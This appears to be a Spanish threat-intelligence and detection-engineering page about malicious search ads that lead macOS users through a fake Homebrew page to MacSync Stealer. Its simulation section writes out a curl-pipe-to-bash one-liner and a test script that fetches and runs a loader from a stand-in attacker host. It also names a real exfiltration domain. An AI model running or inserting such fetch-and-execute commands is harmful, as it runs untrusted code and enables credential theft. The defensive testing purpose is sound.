Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Los atacantes están usando anuncios de búsqueda maliciosos para dirigir a los usuarios a un sitio web falso de Homebrew que apunta a sistemas macOS con el MacSync Stealer. La página falsificada instruye a las víctimas a copiar y ejecutar un comando de shell que descarga y lanza el malware. Una vez activo, el stealer recopila credenciales y detalles del sistema, comprime los datos robados en un archivo ZIP y los envía a un servidor de comando y control. La campaña resalta el creciente uso de la malvertising para comprometer a los usuarios de macOS.
Investigación
El analista rastreó el ataque desde el anuncio malicioso hasta una página suplantada de Homebrew alojada en Google Sites. Esa página presentaba un zsh comando que, al ejecutarse, descargaba scripts adicionales desde una infraestructura controlada por atacantes y creaba un archivo ZIP temporal que contenía los datos recogidos. El tráfico de red confirmó que el archivo fue exfiltrado al dominio glowmedaesthetics.com. Los investigadores documentaron los indicadores relevantes, incluyendo URLs, dominios y rutas de archivos vinculados a la cadena de infección.
Mitigación
Los usuarios deben evitar copiar y ejecutar comandos de sitios web no confiables y verificar la legitimidad de las páginas de gestores de paquetes antes de interactuar con ellas. Extensiones del navegador enfocadas en seguridad o bloqueadores de anuncios pueden ayudar a reducir la exposición a enlaces patrocinados maliciosos. En macOS, Gatekeeper debe permanecer habilitado y la ejecución de aplicaciones debe limitarse a software firmado y de confianza. Los defensores también deben monitorear el tráfico saliente en busca de conexiones a dominios desconocidos.
Respuesta
Los equipos de seguridad deben detectar la ejecución del zsh comando sospechoso y cualquier actividad de curl que llegue a la URL maliciosa identificada. También se deben generar alertas para la creación del archivo /tmp/osalogging.zip y para el tráfico saliente hacia glowmedaesthetics.com. Si se sospecha de una infección, aísle el sistema afectado, recupere evidencia forense y restablezca cualquier credencial comprometida.
"graph TB %% Class Definitions classDef technique fill:#99ccff %% Node definitions initial_malicious_link["<b>Técnica</b> – <b>T1204.001 Enlace Malicioso</b><br/><b>Descripción</b>: La víctima hace clic en un URL malicioso en un anuncio y es dirigida a una página de descarga falsificada de Homebrew."] class initial_malicious_link technique user_copy_paste["<b>Técnica</b> – <b>T1204.004 Copiar y Pegar Malicioso</b><br/><b>Descripción</b>: La víctima copia un script creado desde la página web y lo pega en el Terminal, ejecutando código del atacante."] class user_copy_paste technique unix_shell["<b>Técnica</b> – <b>T1059.004 Shell Unix</b><br/><b>Descripción</b>: El script Zsh se ejecuta, descargando carga adicional desde glowmedaesthetics.com."] class unix_shell technique gui_input_capture["<b>Técnica</b> – <b>T1056.002 Captura de Entrada GUI</b><br/><b>Descripción</b>: Falso aviso de contraseña gráfica captura la contraseña del usuario de macOS."] class gui_input_capture technique local_data_staging["<b>Técnica</b> – <b>T1074.001 Preparación de Datos Locales</b><br/><b>Descripción</b>: La información del sistema y los registros son archivados en /tmp/osalogging.zip para su exfiltración posterior."] class local_data_staging technique exfiltration_c2["<b>Técnica</b> – <b>T1041 Exfiltración a través del Canal C2</b><br/><b>Descripción</b>: El archivo zip es enviado al servidor C2 del atacante mediante HTTPS."] class exfiltration_c2 technique gather_software_info["<b>Técnica</b> – <b>T1592.002 Software</b><br/><b>Descripción</b>: El script enumera el software instalado para crear un inventario del equipo de la víctima."] class gather_software_info technique data_local_system["<b>Técnica</b> – <b>T1005 Datos del Sistema Local</b><br/><b>Descripción</b>: Lee archivos locales adicionales para incluir en el archivo exfiltrado."] class data_local_system technique %% Connections initial_malicious_link –>|lleva_a| user_copy_paste user_copy_paste –>|lleva_a| unix_shell unix_shell –>|lleva_a| gui_input_capture gui_input_capture –>|lleva_a| local_data_staging local_data_staging –>|lleva_a| exfiltration_c2 local_data_staging –>|también lleva_a| gather_software_info local_data_staging –>|también lleva_a| data_local_system "
Flujo de Ataque
Detecciones
Posible Manipulación de Cadenas Codificadas en Base64 [MacOS] (vía línea de comandos)
Ver
Archivo Creado en la Carpeta Temporal de MacOS (vía file_event)
Ver
IOCs (HashSha256) para detectar: Anuncio malicioso para Homebrew conduce a MacSync Stealer
Ver
Detección de la Instalación de MacSync Stealer a través de una Página Falsa de Homebrew [Creación de Procesos en Linux]
Ver
Ejecución de Simulación
Prerequisito: El Chequeo Previo de Telemetría y Línea Base debe haber pasado.
Racional: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección.
-
Narrativa del Ataque y Comandos:
-
Atracción Inicial: La víctima recibe un correo electrónico de phishing que contiene un enlace a una página de “tap” falsa de Homebrew que aloja un script de instalación malicioso.
-
Ejecución: La víctima copia la one‑liner de la página y la pega en su terminal:
curl -fsSL https://malicious.example.com/macsyncloader.sh | /bin/bash- The
curlse invoca el binario (coincide con la regla).
- The
-
Script Descargador (
macsyncloader.sh):- Descarga la carga de MacSync vía
curl. - Escribe la carga en
/tmp/.macsyncy lo ejecuta. - Aparecen cuadros de diálogo que roban credenciales (simuladas vía
osascripten macOS, pero aquí simplemente hacemos echo).
- Descarga la carga de MacSync vía
-
Persistencia: El script registra un LaunchAgent para ejecutarse al iniciar sesión (fuera del alcance de la regla actual, pero relevante para una detección más amplia).
-
-
Script de Prueba de Regresión: El siguiente script de Bash reproduce los pasos exactos, asegurando que la telemetría se alinee con la lógica de detección.
#!/usr/bin/env bash set -euo pipefail # ------------------------------------------------- # Host de script controlado por el atacante simulado # ------------------------------------------------- MALICIOUS_HOST="https://malicious.example.com" LOADER="${MALICIOUS_HOST}/macsyncloader.sh" # ------------------------------------------------- # Paso 1: Descargar y ejecutar el cargador malicioso # ------------------------------------------------- echo "[*] Activando la regla de detección invocando curl ..." curl -fsSL "$LOADER" | /bin/bash # ------------------------------------------------- # Paso 2: (Dentro del cargador) – Carga simulada # ------------------------------------------------- # Normalmente, el cargador se obtendría del host remoto. # Para el propósito de esta prueba, integramos la carga en línea. cat <<'PAYLOAD' > /tmp/.macsync #!/usr/bin/env bash echo "Carga de MacSync ejecutada – exfiltrando información del host..." # Simular obtención de credenciales (sin data real) echo "Credenciales recopiladas: user@example.com / password123" PAYLOAD chmod +x /tmp/.macsync /tmp/.macsync echo "[*] Simulación completada." -
Comandos de Limpieza: Remover artefactos y terminar cualquier proceso restante.
#!/usr/bin/env bash set -euo pipefail echo "[*] Limpiando artefactos de simulación ..." rm -f /tmp/.macsync # No se crearon servicios persistentes en esta prueba echo "[*] Limpieza finalizada."